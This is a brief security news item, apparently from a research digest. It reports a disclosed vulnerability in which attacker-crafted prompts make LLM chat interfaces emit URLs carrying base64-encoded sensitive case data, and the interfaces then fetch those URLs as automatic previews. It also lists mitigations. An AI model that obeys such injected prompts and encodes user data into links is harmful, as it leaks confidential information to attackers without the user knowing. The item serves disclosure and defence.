Researchprompt injectionllmdata exfiltration
URL Previews Expose Sensitive Data in LLMs
8.3
Relevance Score
Security researchers at Prompt Armor disclosed a vulnerability in LLM-powered chat interfaces where automatic URL previews can exfiltrate encoded sensitive data without user interaction. Their OpenClaw demonstration showed attacker-crafted prompts causing the model to emit URLs containing base64-encoded case details that clients fetch as previews. Enterprises connecting AI agents to internal data stores face increased data-loss risk and should consider disabling previews or proxying fetches.


